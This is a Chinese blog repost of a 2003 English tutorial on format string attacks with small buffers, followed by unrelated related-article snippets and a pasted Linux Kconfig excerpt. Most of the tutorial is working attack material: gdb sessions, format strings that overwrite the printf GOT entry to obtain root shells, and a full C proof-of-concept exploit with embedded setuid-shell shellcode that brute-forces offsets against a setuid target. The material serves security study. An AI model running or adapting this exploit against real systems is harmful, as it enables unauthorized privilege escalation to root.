Small buffer format string attack

最新推荐文章于 2024-12-12 09:10:30 发布
最新推荐文章于 2024-12-12 09:10:30 发布 · 428 阅读 · 0
文章标签:

#FP #Bash #F# #Qt #C

本文介绍小缓冲区格式字符串攻击方法。先阐述利用有限缓冲区进行格式字符串攻击的简单方法,通过代码示例展示堆和栈上存储数据时格式字符串攻击的差异,还说明了如何利用 $-flag 查找地址,最后给出完整攻击代码及使用说明。

Small buffer format string attack

Author:szoahc@hotmail.com

=======================================================================================
Title: Small buffer format string attack

Author : dong-hun you (Xpl017Elz) in INetCop <szoahc@hotmail.com>
Home: http://x82.inetcop.org & http://x82.i21c.net

Rough English Translation by KF <dotslash@snosoft.com>
Home: http://www.snosoft.com & http://www.secnetops.biz

Greets: INetCop, KF, Snosoft
=======================================================================================

0x00. Overview
0x01. Training
0x02. Small buffer format string attack


0x00. Overview

There are several documents currently on the internet that describe format string attacks.
This document will explain a simple method that you can use when you are exploiting a format
string with limited buffer space.


0x01. Training

The following code contains an exploitable heap based format string vulnerability.
In order to understand the following text, you must be aware of the `$-flag' style format string.

--- test1.c ----------------------------------------------------------------------
int main(int argc, char *argv[])
{
char *x=(char *)malloc(40);
strncpy(x,argv[1],40);
printf(x);
printf("\n");
}
----------------------------------------------------------------------------------

$ ./vuln %x%x%x
8049770bfffdb68400311eb
$

0x08049770 is a heap variable address that was declared through malloc.
This variable stores the "user input" for example "%x%x%x".

$ gdb -q vuln
(gdb) br *main+70
Breakpoint 1 at 0x804847e
(gdb) r %x%x%x
Starting program: /tmp/vuln %x%x%x
8049770bfffdb68400311eb

Breakpoint 1, 0x804847e in main ()
(gdb) x/8 0x08049770
0x8049770: 0x78257825 0x00007825 0x00000000 0x00000000
0x8049780: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)

If that variable is stored on the heap exploitation becomes more difficult.
The reason is because the format string "%x" can not easily find an address
in the heap. However, if the inputed data is stored to stack, it's easy to find.
In our example the "user input" is stored on the stack. We can confirm this if we
analyze further. You will notice the string is near the environment variables that
were loaded by the shell.

...
0xbfffdc97: "i586"
0xbfffdc9c: "/tmp/vuln"
0xbfffdca6: "%x%x%x" <- here.
0xbfffdcad: "LESSOPEN=|lesspipe.sh %s"
0xbfffdcc7: "QT_HANFONT=-*-kodig-medium-r-normal--12-*-ksc5601.1987-0,-*-kodig-medium-r-normal--14-*-ksc5601.1987-0,-*-kodig-medium-r-normal--16-*-ksc5601.1987-0,-*-kodig-medium-r-normal--18-*-ksc5601.1987-0,-*-ko"...
(gdb)
0xbfffdd8f: "dig-medium-r-normal--20-*-ksc5601.1987-0,-*-kodig-medium-r-normal--24-*-ksc5601.1987-0"
0xbfffdde6: "QT_KEYBOARD=2"
0xbfffddf4: "HISTSIZE=1000"
...

As you can see we are able to find "%x%x%x".
We need to store retloc's value at 0xbfffdca6, then we can reach it through $-flag or "%8x%8x%8x%8x..".
So, even if the contents of the above mentioned variable are stored to heap, we can still manage to exploit the problem.
The position of address value you need to refer to can be guessed or you can find it by doing the following.

$ ./vuln AAAA%88\$x%89\$x%90\$x
AAAA414141412438382539382578
$ gdb -q vuln
(gdb) disass printf
Dump of assembler code for function printf:
0x8048364 <printf>: jmp *0x8049510
0x804836a <printf+6>: push $0x20
0x804836f <printf+11>: jmp 0x8048314 <_init+48>
End of assembler dump.
(gdb)

If you do testing in gdb, in some cases the addresses are different from if you only ran from the shell prompt.
Either way, you could test your final format code as following.

$ gdb -q vuln
(gdb) r `printf "\x10\x95\x04\x08\x12\x95\x04\x08"`%16697x%91\$hn%00257x%90\$hnAA
Starting program: /tmp/vuln `printf "\x10\x95\x04\x08\x12\x95\x04\x08"`%16697x%91\$hn%00257x%90\$hnAA

...

Program received signal SIGSEGV, Segmentation fault.
0x41414242 in ?? ()
(gdb)

The Value that caused 0x4141 is %16697x (decimal). This value is first stored at 0x08049512.
And then, the value 0x4242 is stored %257x at 0x08049510.
Using this method we store the value 0x41414242 in GOT.

Above, we used the $-flag to find our "user input".
One problem I failed to mention was that we are working with a small buffer and we do not have room for our shellcode,
How does it do exploit?


0x02. Small buffer format string attack

First, let's understand how a format string can find an address.
This may be simple information that you know already.

int main()
{
char string[]="It's test!";
char format_str[]="\x41\x41\x41\x41%s\n";
printf(format_str);
}

0x41414141 should store the address value that points to where the variable string[] is allocated.
Through gdb, can confirm that string is to 0x8048470.

(gdb) x/s 0x8048470
0x8048470 <_IO_stdin_used+4>: "It's test!"
(gdb)

Let's substitute this address in the above sample code by writing a simple patch.

$ cat > patch
--- test.c Tue Jun 3 20:47:51 2003
+++ test.patch.c Tue Jun 3 20:48:02 2003
@@ -1,6 +1,6 @@
int main()
{
char string[]="It's test!";
- char format_str[]="\x41\x41\x41\x41%s\n";
+ char format_str[]="\x70\x84\x04\x08%s\n";
printf(format_str);
}
^C
$ patch < patch
patching file `test.c'
$ gcc -o test test.c && ./test
It's test!
$

When the '%s' format string is applied to the address 0x08048470 it would display the contents of that address.
An attacker would rather change a memory address by using (%hn or %n) to GOT, .dtors, or a specific return address.

As we already showed, if attacker's input exists on the stack it can be reached through a format string like `$-flag'
or `%8x'.

If the proper return address is stored on the stack, you may not need to put your own return address value in front
of the format string. In other words your own GOT, .dtors, return address (short size 8byte, general size 16byte, long
size 32byte) that is usually placed in front of the format string may not needed.

As an attacker you might ask if the value that you use for your own return address can point to anywhere?
For local exploits one approach is to use environment variables to store the address. With values stored in the
environment you can simply reference them via the `$-flag'.

When attacking one other thing you need to know is the conversion for your shellcode address into decimal.

To finish us I will talk about the small buffer space I mentioned above. The buffer space is only 30bytes.

Hmmm ... Instead of placing the return address in an environment variable you can also place it in arguments of the
program. If the format string is placed in argument 0 it will be stored on the stack and it will be stored closer in
distance to the general environment variables. This can be useful in small buffer space.

First we will try the exploit using an environment variable.
After execute eggshell,

# ./eggshell

Using shellcode address: 0xbffff9a8

bash# export A=`perl -e 'print "\x10\x95\x04\x08\x12\x95\x04\x08"x20'`

Stored GOT address in environment variable of `A'.

bash# gdb -q vuln
(gdb) r %49151x%261\$hn%15641x%262\$hn
Starting program: /tmp/vuln %49151x%261\$hn%15641x%262\$hn

...
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001780 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) c
Continuing.
bash# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash# exit
exit

Program exited normally.
(gdb) q
bash#

You can also as stated above add the return address with the format string.
This time we try the exploit through an argument rather than an environment variable.

bash-2.04# cat test.c
main() {
execl("./vuln","\xb8\x95\x04\x08\xba\x95\x04\x08","%49151x%97$hn%14775x%96$hn",0);
}
bash-2.04# ./test
...
...
...
sh-2.04#

WoW, by Inserting the GOT address code to the first `argument 0th' included with the (%96$x%97$x)
the minimum dimensions of assailable buffer space becomes 26 bytes.

Based on this proof show above, format string exploits are possible in a minimum of 26 bytes of buffer
space. If this occurs in a remote environment, or don't store value in environment variable,
you may make use of the stack that is used by the program. (For example, program that require user's
input)

I prepared some exploit code so that you can exploit this conveniently on Linux (My box runs RedHat).
One method is to use an environment variable, and the other method is to use an argument.
Both methods, can exploit in small buffer environment that is fewer than 30 bytes.

Usage example: --

[root@xpl017elz /tmp]# chmod 6755 vuln
[root@xpl017elz /tmp]# su x82
[x82@xpl017elz /tmp]$ ./0x82-sfmt_xpl

Proof of Concept 26byte small buffer format string exploit.

[+] GOT (printf) address: 0x8049510
[+] Shellcode address: 0xbfffffb7
[+] Attack mode: Environment variable.
[+] flag and pad brute-force mode:
........................................................................

Found it!!!
[+] Pad: 3
[+] Flag: 72
[+] Attack format string: %49151x%73$hn%16312x%72$hn
[+] code size: 26byte

Input [ENTER]:

...

8049770

...
...

bash#

--
Thank you.


-- Appending code --

=========== vuln.c ===========
/*
**
** code name: vuln.c
** description: Weak program to format string attack.
**
*/

int main(int argc, char *argv[])
{
char *x0x=(char *)malloc(26);
strncpy(x0x,argv[1],26);
printf(x0x);
printf("\n");
}

=========== eoc ==============

====== 0x82-sfmt_xpl.c =======
/*
**
** code name: 0x82-sfmt_xpl.c
** description: Proof of Concept 26byte small buffer format string exploit
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>

#define OBJDUMP "/usr/bin/objdump"
#define GREP "/bin/grep"
#define AWK "/bin/awk"
#define TARGET "./vuln"
#define d_size (0x000000ff)
#define s_size (sizeof(int)*4)
#define df_flg (0x0000012c)

int scs=(0);
int arg=(0);
int flag=(1);
int m_pad=(4),pad;
int jnk_one,jnk_two;
u_long got,shr;
char tg_f_nm[(d_size)]=(TARGET);
char shellcode[]=
"\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40"
"\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40\x90\x40"
"\x90\x40\x90\x40\x90\x40\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

u_long __get_dtors(char *f_name);
void __mk_str_code(char *env_arg_atk,char *exec_t,char *got_buf);
void tl_exploit_f(int fd,char *env_arg_atk,char *exec_t);
void cpl_usage(char *f_name);
void banrl();

int main(int argc,char *argv[])
{
int whgl;
pid_t pid;
struct stat s_t;
char exec_t[(d_size)];
char env_arg_atk[(d_size)];
char got_buf[(s_size)];

memset((char *)got_buf,0,sizeof(got_buf));
memset((char *)env_arg_atk,0,sizeof(env_arg_atk));
memset((char *)exec_t,0,sizeof(exec_t));

(void)banrl();
while((whgl=getopt(argc,argv,"M:m:T:t:F:f:P:p:Hh"))!=EOF)
{
extern char *optarg;
switch(whgl)
{
case 'M':
case 'm':
if((arg=atoi(optarg))>1)
{
(void)cpl_usage(argv[0]);
}
break;

case 'T':
case 't':
memset((char *)tg_f_nm,0,sizeof(tg_f_nm));
strncpy(tg_f_nm,optarg,sizeof(tg_f_nm)-1);
break;

case 'F':
case 'f':
if((flag=atoi(optarg))>(df_flg))
{
fprintf(stderr," [-] $-flag value error.\n\n");
exit(-1);
}
break;

case 'P':
case 'p':
m_pad=atoi(optarg);
break;

case 'H':
case 'h':
(void)cpl_usage(argv[0]);
break;

case '?':
(void)cpl_usage(argv[0]);
break;
}
}

if((stat((tg_f_nm),&s_t)!=0))
{
fprintf(stderr," [-] target program path: %s not found.\n\n",(tg_f_nm));
exit(-1);
}
got=(__get_dtors(tg_f_nm));
shr=((0xbfffffff)-(strlen(shellcode)));
if((!got))
{
fprintf(stdout," [-] GOT (printf) address getting failed.\n\n");
exit(-1);
}

fprintf(stdout," [+] GOT (printf) address: %p\n",got);
fprintf(stdout," [+] Shellcode address: %p\n",shr);
fprintf(stdout," [+] Attack mode: %s.\n", (arg)?"Argument":"Environment variable");

got_buf[0]=got_buf[4]=(got&0x000000ff)>>0;
got_buf[1]=got_buf[5]=(got&0x0000ff00)>>8;
got_buf[2]=got_buf[6]=(got&0x00ff0000)>>16;
got_buf[3]=got_buf[7]=(got&0xff000000)>>24;
got_buf[4]+=(0x2);
jnk_one=((shr&0xffff0000)>>16);
jnk_two=((shr&0x0000ffff)>>0)-(jnk_one);

fprintf(stdout," [+] flag and pad brute-force mode:\n ");
for(;flag<=(df_flg);flag++)
{
fprintf(stdout,".");
fflush(stdout);
for(pad=0;pad<=(m_pad);pad++)
{
int out[2],in[2];
(void)__mk_str_code(env_arg_atk,exec_t,got_buf);
if(pipe(out)==-1)
{
perror(" [-] pipe (out) error");
exit(-1);
}
if(pipe(in)==-1)
{
perror(" [-] pipe (in) error");
exit(-1);
}
switch(pid=fork())
{
case -1:
perror(" [-] fork() error");
break;

case 0:
close(out[0]);
close(in[1]);
dup2(out[1],STDOUT_FILENO);
dup2(in[0],STDIN_FILENO);
{
char *test_emt[3];
if(!arg)
{
test_emt[0]=(env_arg_atk);
test_emt[1]=(shellcode);
test_emt[2]=(NULL);
execle(tg_f_nm,tg_f_nm,exec_t,NULL,test_emt);
}
else
{
test_emt[0]=(shellcode);
test_emt[1]=(NULL);
execle(tg_f_nm,env_arg_atk,exec_t,NULL,test_emt);
}
}
break;

default:
close(out[1]);
close(in[0]);
(void)tl_exploit_f(out[0],env_arg_atk,exec_t);
close(out[0]);
close(in[1]);
break;
}
wait(&pid);
}
}
if(!scs)
{
fprintf(stdout,"\n [-] Sorry, GOT address not found.\n\n");
exit(-1);
}
}

u_long __get_dtors(char *f_name)
{
char st_exec[(d_size)*2];
FILE *fp;
char fd_addr[(s_size)];

memset((char *)st_exec,0,sizeof(st_exec));
snprintf(st_exec,sizeof(st_exec)-1,
// objdump -R ./vuln | grep printf
"%s -R %s"
" | %s printf"
" | %s -F\" \""
" '{print $1}'",
(OBJDUMP),f_name,(GREP),(AWK));
if((fp=(FILE *)popen(st_exec,"r"))==NULL)
{
perror(" [-] popen() error");
exit(-1);
}
memset((char *)fd_addr,0,sizeof(fd_addr));
fgets(fd_addr,sizeof(fd_addr)-1,fp);
pclose(fp);

return(strtoul(fd_addr,NULL,sizeof(fd_addr)));
}

void __mk_str_code(char *env_arg_atk,char *exec_t,char *got_buf)
{
char pad_t[(s_size)];
int cl_pad=(pad);
memset((char *)pad_t,0,sizeof(pad_t));

while(cl_pad)
{
cl_pad--;
pad_t[cl_pad]='+';
}
memset((char *)env_arg_atk,0,(d_size));
snprintf(env_arg_atk,(d_size)-1,"%s%s",got_buf,pad_t);
memset((char *)exec_t,0,(d_size));
snprintf(exec_t,(d_size)-1,"0000000%%%d$xx0000000%%%d$xx",flag,flag+1);
}

void tl_exploit_f(int fd,char *env_arg_atk,char *exec_t)
{
char *r_emt[3];
char rslt[(d_size)];
char rslt_buf[(d_size)];
memset((char *)rslt,0,sizeof(rslt));
memset((char *)rslt_buf,0,sizeof(rslt_buf));

read(fd,rslt,sizeof(rslt)-1);
snprintf(rslt_buf,sizeof(rslt_buf)-1,"0000000%xx0000000%xx",got,got+2);

if(strstr(rslt,rslt_buf))
{
scs+=(1);
fprintf(stdout,"\n
Found it!!!\n");
fprintf(stdout," [+] Pad: %d\n",pad);
fprintf(stdout," [+] Flag: %d\n",flag);
memset((char *)exec_t,0,(d_size));
snprintf(exec_t,(d_size)-1,"%%%dx%%%d$hn%%%dx%%%d$hn",jnk_one,flag+1,jnk_two,flag);
fprintf(stdout," [+] Attack format string: %s\n",exec_t);
fprintf(stdout," [+] code size: %dbyte\n",strlen(exec_t));
fprintf(stdout,"
Input [ENTER]: ");
fflush(stdout);
getchar();

if(!arg)
{
r_emt[0]=(env_arg_atk);
r_emt[1]=(shellcode);
r_emt[2]=(NULL);
execle(tg_f_nm,tg_f_nm,exec_t,NULL,r_emt);
}
else
{
r_emt[0]=(shellcode);
r_emt[1]=(NULL);
execle(tg_f_nm,env_arg_atk,exec_t,NULL,r_emt);
}
}
}

void cpl_usage(char *f_name)
{
fprintf(stdout," Usage: %s -option argument\n\n",f_name);
fprintf(stdout,"\t -m [target num] : Select exploit mode. (default: %d)\n",arg);
fprintf(stdout,"\t\t\t{0} : Environment variable.\n");
fprintf(stdout,"\t\t\t{1} : Argument.\n");
fprintf(stdout,"\t -t [target path] : target program path. (default: %s)\n",tg_f_nm);
fprintf(stdout,"\t -f [flag num] : $-flag number. (default: %d)\n",flag);
fprintf(stdout,"\t -p [pad num] : max pad number. (default: %d)\n",m_pad);
fprintf(stdout,"\t -h : help information.\n\n");
fprintf(stdout," Example: %s -t%s -m%d\n\n",f_name,tg_f_nm,arg);
exit(-1);
}

void banrl()
{
fprintf(stdout,"\n Proof of Concept 26byte small buffer format string exploit.\n\n");
}

=========== eoc ==============

iteye_3619
关注
【rustdesk 】rfc5128 :跨NATs的P2P通信技术 和rdserver
突围
04-17 1223
Endpoint-Independent Mapping NAT(简称EIM-NAT)是一种NAT。BEHAVE 文档([BEH-UDP]、[BEH-TCP] 和 [BEH-ICMP])。应用程序和 NAT 设备,即 [NAT-PMP]、[NSIS-NSLP]、[SOCKS]、“Endpoint-Dependent Filtering”指的是“Address-文档中,指的是Traditional NAT [NAT-TRAD]。[RSIP]、[MIDCOM] 和 [UPNP] 超出了本文档的范围。
厦门IT公司名单及联系方式
热门推荐
AmoyCHC的专栏
09-24 4万+
厦门高士达科技实业有限公司:(已走访并开展了座谈) 地址:厦门软件园观日路58号9楼 总机:2958000 联系人:童小姐(人事专员) 厦门恒深智能软件系统有限公司:(已走访) 电话:0592-2516988 2516986 厦门市美亚柏科资讯科技有限公司:(已走访) 主页:http://www.inetcop.com.cn/ 联系电话:0592-3929988 何小姐 传真
Web安全 Buffer Overflow Attack实验
zaxguo的专栏
11-20 2322
Assignment 7  Buffer Overflow Attack 一开始我直接复制粘贴了蔡老师的代码,结果一直得不到预期的输出,但是之后我再看了看蔡老师的课件,又去网上重新找了找资料,终于完成了这次实验。 核心思想: 当程序执行strcpy时,程序将char[]中的内容拷入buffer中,但是buffer只能容纳16 Bytes。由于C语言不进行边界
printf与wprintf不能同时混合使用的原因
enockipp的小'码'头
07-14 1725
ISO C90 introduced the new type wchar_t to allow handling larger character sets. What was missing was a possibility to output strings of wchar_t directly. One had to convert them into multibyte stri
CSAPP: Buffer Lab
未选之路
07-05 1万+
深入理解计算机系统中的buffer lab
Format_String_Attack_Lab
Yuhan2001的优快云博客
12-05 4785
软件安全课程实验:Format_String_Attack_Lab; 版本:SeedUbuntu20.04; 课本:计算机安全导论:深度实践;
The Attack Lab Buffer Overffow Bugs
qq99515681的博客
12-12 918
As usual, this is an individual 代写The Attack Lab Buffer Overffow Bugs project. You will generate attacks for target programs that are custom generated。
【嵌入式安全扫盲一】Stack buffer overflow
自由的天空
08-16 1711
出处:https://en.wikipedia.org/wiki/Stack_buffer_overflow Stack buffer overflow From Wikipedia, the free encyclopedia For other uses, see Stack overflow (disambiguation). In sof
Exploitation of Buffer Overflow Vulnerabilities Under Windows XP
04-28 4636
Hitchhikers World (Issue #8) http://www.infosecwriters.com/hhworld/ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The String Formatters of Manor Farm(zz)
afxid的专栏
03-23 1805
The String Formatters of Manor Farm  This article appeared in C/C++ Users Journal, 19(11), November 2001. "All animals are equal, but some animals are more equal than others."               
Node.js v12.16.2 的文档中,“Errors“(错误)部分主要介绍了在 Node.js 运行过程中可能会遇到的错误类型及其处理方法
BLOG域名:programb.blog.youkuaiyun.com
04-16 4175
上述介绍了几种常见场景下的错误类别划分依据及其对应的解决方案思路。合理运用它们可以帮助构建更加健壮可靠的系统架构设计。Node.js v12.16.2 的文档中,“Errors”(错误)部分主要介绍了在 Node.js 运行过程中可能会遇到的错误类型及其处理方法。
Kconfig如下 开启哪些可以配置tcp_delack_min # # IP configuration # config IP_MULTICAST bool "IP: multicasting" help This is code for addressing several networked computers at once, enlarging your kernel by about 2 KB. You need multicasting if you intend to participate in the MBONE, a high bandwidth network on top of the Internet which carries audio and video broadcasts. More information about the MBONE is on the WWW at <http://www.savetz.com/mbone/>. For most people, it's safe to say N. config IP_ADVANCED_ROUTER bool "IP: advanced router" ---help--- If you intend to run your Linux box mostly as a router, i.e. as a computer that forwards and redistributes network packets, say Y; you will then be presented with several options that allow more precise control about the routing process. The answer to this question won't directly affect the kernel: answering N will just cause the configurator to skip all the questions about advanced routing. Note that your box can only act as a router if you enable IP forwarding in your kernel; you can do that by saying Y to "/proc file system support" and "Sysctl support" below and executing the line echo "1" > /proc/sys/net/ipv4/ip_forward at boot time after the /proc file system has been mounted. If you turn on IP forwarding, you should consider the rp_filter, which automatically rejects incoming packets if the routing table entry for their source address doesn't match the network interface they're arriving on. This has security advantages because it prevents the so-called IP spoofing, however it can pose problems if you use asymmetric routing (packets from you to a host take a different path than packets from that host to you) or if you operate a non-routing host which has several IP addresses on different interfaces. To turn rp_filter on use: echo 1 > /proc/sys/net/ipv4/conf/<device>/rp_filter or echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter Note that some distributions enable it in startup scripts. For details about rp_filter strict and loose mode read <file:Documentation/networking/ip-sysctl.txt>. If unsure, say N here. config IP_FIB_TRIE_STATS bool "FIB TRIE statistics" depends on IP_ADVANCED_ROUTER ---help--- Keep track of statistics on structure of FIB TRIE table. Useful for testing and measuring TRIE performance. config IP_MULTIPLE_TABLES bool "IP: policy routing" depends on IP_ADVANCED_ROUTER select FIB_RULES ---help--- Normally, a router decides what to do with a received packet based solely on the packet's final destination address. If you say Y here, the Linux router will also be able to take the packet's source address into account. Furthermore, the TOS (Type-Of-Service) field of the packet can be used for routing decisions as well. If you need more information, see the Linux Advanced Routing and Traffic Control documentation at <http://lartc.org/howto/lartc.rpdb.html> If unsure, say N. config IP_ROUTE_MULTIPATH bool "IP: equal cost multipath" depends on IP_ADVANCED_ROUTER help Normally, the routing tables specify a single action to be taken in a deterministic manner for a given packet. If you say Y here however, it becomes possible to attach several actions to a packet pattern, in effect specifying several alternative paths to travel for those packets. The router considers all these paths to be of equal "cost" and chooses one of them in a non-deterministic fashion if a matching packet arrives. config IP_ROUTE_VERBOSE bool "IP: verbose route monitoring" depends on IP_ADVANCED_ROUTER help If you say Y here, which is recommended, then the kernel will print verbose messages regarding the routing, for example warnings about received packets which look strange and could be evidence of an attack or a misconfigured system somewhere. The information is handled by the klogd daemon which is responsible for kernel messages ("man klogd"). config IP_ROUTE_CLASSID bool config IP_PNP bool "IP: kernel level autoconfiguration" help This enables automatic configuration of IP addresses of devices and of the routing table during kernel boot, based on either information supplied on the kernel command line or by BOOTP or RARP protocols. You need to say Y only for diskless machines requiring network access to boot (in which case you want to say Y to "Root file system on NFS" as well), because all other machines configure the network in their startup scripts. config IP_PNP_DHCP bool "IP: DHCP support" depends on IP_PNP ---help--- If you want your Linux box to mount its whole root file system (the one containing the directory /) from some other computer over the net via NFS and you want the IP address of your computer to be discovered automatically at boot time using the DHCP protocol (a special protocol designed for doing this job), say Y here. In case the boot ROM of your network card was designed for booting Linux and does DHCP itself, providing all necessary information on the kernel command line, you can say N here. If unsure, say Y. Note that if you want to use DHCP, a DHCP server must be operating on your network. Read <file:Documentation/filesystems/nfs/nfsroot.txt> for details. config IP_PNP_BOOTP bool "IP: BOOTP support" depends on IP_PNP ---help--- If you want your Linux box to mount its whole root file system (the one containing the directory /) from some other computer over the net via NFS and you want the IP address of your computer to be discovered automatically at boot time using the BOOTP protocol (a special protocol designed for doing this job), say Y here. In case the boot ROM of your network card was designed for booting Linux and does BOOTP itself, providing all necessary information on the kernel command line, you can say N here. If unsure, say Y. Note that if you want to use BOOTP, a BOOTP server must be operating on your network. Read <file:Documentation/filesystems/nfs/nfsroot.txt> for details. config IP_PNP_RARP bool "IP: RARP support" depends on IP_PNP help If you want your Linux box to mount its whole root file system (the one containing the directory /) from some other computer over the net via NFS and you want the IP address of your computer to be discovered automatically at boot time using the RARP protocol (an older protocol which is being obsoleted by BOOTP and DHCP), say Y here. Note that if you want to use RARP, a RARP server must be operating on your network. Read <file:Documentation/filesystems/nfs/nfsroot.txt> for details. config NET_IPIP tristate "IP: tunneling" select INET_TUNNEL select NET_IP_TUNNEL ---help--- Tunneling means encapsulating data of one protocol type within another protocol and sending it over a channel that understands the encapsulating protocol. This particular tunneling driver implements encapsulation of IP within IP, which sounds kind of pointless, but can be useful if you want to make your (or some other) machine appear on a different network than it physically is, or to use mobile-IP facilities (allowing laptops to seamlessly move between networks without changing their IP addresses). Saying Y to this option will produce two modules ( = code which can be inserted in and removed from the running kernel whenever you want). Most people won't need this and can say N. config NET_IPGRE_DEMUX tristate "IP: GRE demultiplexer" help This is helper module to demultiplex GRE packets on GRE version field criteria. Required by ip_gre and pptp modules. config NET_IP_TUNNEL tristate select DST_CACHE select GRO_CELLS default n config NET_IPGRE tristate "IP: GRE tunnels over IP" depends on (IPV6 || IPV6=n) && NET_IPGRE_DEMUX select NET_IP_TUNNEL help Tunneling means encapsulating data of one protocol type within another protocol and sending it over a channel that understands the encapsulating protocol. This particular tunneling driver implements GRE (Generic Routing Encapsulation) and at this time allows encapsulating of IPv4 or IPv6 over existing IPv4 infrastructure. This driver is useful if the other endpoint is a Cisco router: Cisco likes GRE much better than the other Linux tunneling driver ("IP tunneling" above). In addition, GRE allows multicast redistribution through the tunnel. config NET_IPGRE_BROADCAST bool "IP: broadcast GRE over IP" depends on IP_MULTICAST && NET_IPGRE help One application of GRE/IP is to construct a broadcast WAN (Wide Area Network), which looks like a normal Ethernet LAN (Local Area Network), but can be distributed all over the Internet. If you want to do that, say Y here and to "IP multicast routing" below. config IP_MROUTE_COMMON bool depends on IP_MROUTE || IPV6_MROUTE config IP_MROUTE bool "IP: multicast routing" depends on IP_MULTICAST select IP_MROUTE_COMMON help This is used if you want your machine to act as a router for IP packets that have several destination addresses. It is needed on the MBONE, a high bandwidth network on top of the Internet which carries audio and video broadcasts. In order to do that, you would most likely run the program mrouted. If you haven't heard about it, you don't need it. config IP_MROUTE_MULTIPLE_TABLES bool "IP: multicast policy routing" depends on IP_MROUTE && IP_ADVANCED_ROUTER select FIB_RULES help Normally, a multicast router runs a userspace daemon and decides what to do with a multicast packet based on the source and destination addresses. If you say Y here, the multicast router will also be able to take interfaces and packet marks into account and run multiple instances of userspace daemons simultaneously, each one handling a single table. If unsure, say N. config IP_PIMSM_V1 bool "IP: PIM-SM version 1 support" depends on IP_MROUTE help Kernel side support for Sparse Mode PIM (Protocol Independent Multicast) version 1. This multicast routing protocol is used widely because Cisco supports it. You need special software to use it (pimd-v1). Please see <http://netweb.usc.edu/pim/> for more information about PIM. Say Y if you want to use PIM-SM v1. Note that you can say N here if you just want to use Dense Mode PIM. config IP_PIMSM_V2 bool "IP: PIM-SM version 2 support" depends on IP_MROUTE help Kernel side support for Sparse Mode PIM version 2. In order to use this, you need an experimental routing daemon supporting it (pimd or gated-5). This routing protocol is not used widely, so say N unless you want to play with it. config SYN_COOKIES bool "IP: TCP syncookie support" ---help--- Normal TCP/IP networking is open to an attack known as "SYN flooding". This denial-of-service attack prevents legitimate remote users from being able to connect to your computer during an ongoing attack and requires very little work from the attacker, who can operate from anywhere on the Internet. SYN cookies provide protection against this type of attack. If you say Y here, the TCP/IP stack will use a cryptographic challenge protocol known as "SYN cookies" to enable legitimate users to continue to connect, even when your machine is under attack. There is no need for the legitimate users to change their TCP/IP software; SYN cookies work transparently to them. For technical information about SYN cookies, check out <http://cr.yp.to/syncookies.html>. If you are SYN flooded, the source address reported by the kernel is likely to have been forged by the attacker; it is only reported as an aid in tracing the packets to their actual source and should not be taken as absolute truth. SYN cookies may prevent correct error reporting on clients when the server is really overloaded. If this happens frequently better turn them off. If you say Y here, you can disable SYN cookies at run time by saying Y to "/proc file system support" and "Sysctl support" below and executing the command echo 0 > /proc/sys/net/ipv4/tcp_syncookies after the /proc file system has been mounted. If unsure, say N. config NET_IPVTI tristate "Virtual (secure) IP: tunneling" depends on IPV6 || IPV6=n select INET_TUNNEL select NET_IP_TUNNEL depends on INET_XFRM_MODE_TUNNEL ---help--- Tunneling means encapsulating data of one protocol type within another protocol and sending it over a channel that understands the encapsulating protocol. This can be used with xfrm mode tunnel to give the notion of a secure tunnel for IPSEC and then use routing protocol on top. config NET_UDP_TUNNEL tristate select NET_IP_TUNNEL default n config NET_FOU tristate "IP: Foo (IP protocols) over UDP" select XFRM select NET_UDP_TUNNEL ---help--- Foo over UDP allows any IP protocol to be directly encapsulated over UDP include tunnels (IPIP, GRE, SIT). By encapsulating in UDP network mechanisms and optimizations for UDP (such as ECMP and RSS) can be leveraged to provide better service. config NET_FOU_IP_TUNNELS bool "IP: FOU encapsulation of IP tunnels" depends on NET_IPIP || NET_IPGRE || IPV6_SIT select NET_FOU ---help--- Allow configuration of FOU or GUE encapsulation for IP tunnels. When this option is enabled IP tunnels can be configured to use FOU or GUE encapsulation. config INET_AH tristate "IP: AH transformation" select XFRM_ALGO select CRYPTO select CRYPTO_HMAC select CRYPTO_MD5 select CRYPTO_SHA1 ---help--- Support for IPsec AH. If unsure, say Y. config INET_ESP tristate "IP: ESP transformation" select XFRM_ALGO select CRYPTO select CRYPTO_AUTHENC select CRYPTO_HMAC select CRYPTO_MD5 select CRYPTO_CBC select CRYPTO_SHA1 select CRYPTO_DES select CRYPTO_ECHAINIV ---help--- Support for IPsec ESP. If unsure, say Y. config INET_ESP_OFFLOAD tristate "IP: ESP transformation offload" depends on INET_ESP select XFRM_OFFLOAD default n ---help--- Support for ESP transformation offload. This makes sense only if this system really does IPsec and want to do it with high throughput. A typical desktop system does not need it, even if it does IPsec. If unsure, say N. config INET_IPCOMP tristate "IP: IPComp transformation" select INET_XFRM_TUNNEL select XFRM_IPCOMP ---help--- Support for IP Payload Compression Protocol (IPComp) (RFC3173), typically needed for IPsec. If unsure, say Y. config INET_TABLE_PERTURB_ORDER int "INET: Source port perturbation table size (as power of 2)" if EXPERT default 16 help Source port perturbation table size (as power of 2) for RFC 6056 3.3.4. Algorithm 4: Double-Hash Port Selection Algorithm. The default is almost always what you want. Only change this if you know what you are doing. config INET_XFRM_TUNNEL tristate select INET_TUNNEL default n config INET_TUNNEL tristate default n config INET_XFRM_MODE_TRANSPORT tristate "IP: IPsec transport mode" default y select XFRM ---help--- Support for IPsec transport mode. If unsure, say Y. config INET_XFRM_MODE_TUNNEL tristate "IP: IPsec tunnel mode" default y select XFRM ---help--- Support for IPsec tunnel mode. If unsure, say Y. config INET_XFRM_MODE_BEET tristate "IP: IPsec BEET mode" default y select XFRM ---help--- Support for IPsec BEET mode. If unsure, say Y. config INET_DIAG tristate "INET: socket monitoring interface" default y ---help--- Support for INET (TCP, DCCP, etc) socket monitoring interface used by native Linux tools such as ss. ss is included in iproute2, 